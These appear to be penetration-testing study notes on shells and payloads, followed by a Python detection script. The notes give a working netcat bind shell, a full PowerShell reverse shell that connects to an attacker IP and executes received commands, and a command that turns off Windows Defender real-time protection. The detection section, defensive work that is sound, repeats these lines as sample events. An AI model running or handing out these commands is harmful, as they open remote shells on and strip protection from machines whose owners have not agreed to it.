Shells & Payloads

Bind Shells

With a bind shell, the target system starts a listener and waits for a connection from the pentester's system (attack box).

Basic Bind Shell with Netcat

Server - Binding a Bash shell to the TCP session

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f

Client - Connecting to bind shell on target

nc -nv 10.129.41.200 7777

Reverse Shells

With a reverse shell, the attack box runs the listener and the target initiates the connection.

Simple Reverse Shell in Windows

Server (attack box)

sudo nc -lvnp 443

Client (target)

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Windows Defender antivirus (AV) software stopped the execution of the code.

Disable AV

The antivirus can be disabled through the Virus & threat protection settings or by running this command in an administrative PowerShell console:

Set-MpPreference -DisableRealtimeMonitoring $true

Once AV is disabled, attempt to execute the code again.
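
Detecting these commands

From the defender's side, the bind shell, the PowerShell reverse shell and the Defender change above each leave a distinctive process command line. The following Python sketch is an added example (not part of the original notes) that flags them in constructed sample process-creation events; the rule names, host names and event format are assumptions.

```python
import re

# Each rule fires only when ALL of its patterns occur in one command line.
RULES = {
    "fifo_netcat_bind_shell": [
        r"\bmkfifo\b",
        r"\b(?:nc|ncat|netcat)\b[^|;]*\s-\w*l",   # netcat in listen mode
        r"\b(?:ba)?sh\s+-i\b",                    # interactive shell
    ],
    "powershell_tcpclient_shell": [
        r"System\.Net\.Sockets\.TCPClient",
        r"GetStream\(\)",
        r"\b(?:iex|Invoke-Expression)\b",         # executes received text
    ],
    "defender_realtime_disabled": [
        r"\bSet-MpPreference\b",
        r"-DisableRealtimeMonitoring[\s:]+(?:\$true|1)\b",
    ],
}
COMPILED = {name: [re.compile(p, re.IGNORECASE) for p in pats]
            for name, pats in RULES.items()}

def match_rules(cmdline):
    """Return the names of all rules whose patterns all match cmdline."""
    return [name for name, pats in COMPILED.items()
            if all(p.search(cmdline) for p in pats)]

def scan(events):
    """events: iterable of (host, cmdline); returns [(host, rule), ...]."""
    return [(host, rule) for host, cmd in events for rule in match_rules(cmd)]

# Constructed sample events (host names are hypothetical; the PowerShell
# line is abbreviated with "..." and is not a working command).
SAMPLE_EVENTS = [
    ("lnx01", "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f"),
    ("lnx01", "nc -nv 10.129.41.200 7777"),
    ("win01", "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();...;$sendback = (iex $data 2>&1 | Out-String );...\""),
    ("win01", "Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("win02", "Set-MpPreference -DisableRealtimeMonitoring $false"),
]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Feed it command lines from process-creation telemetry (for example Windows Security event 4688 or Sysmon event ID 1). The patterns are deliberately narrow and will miss renamed or obfuscated variants.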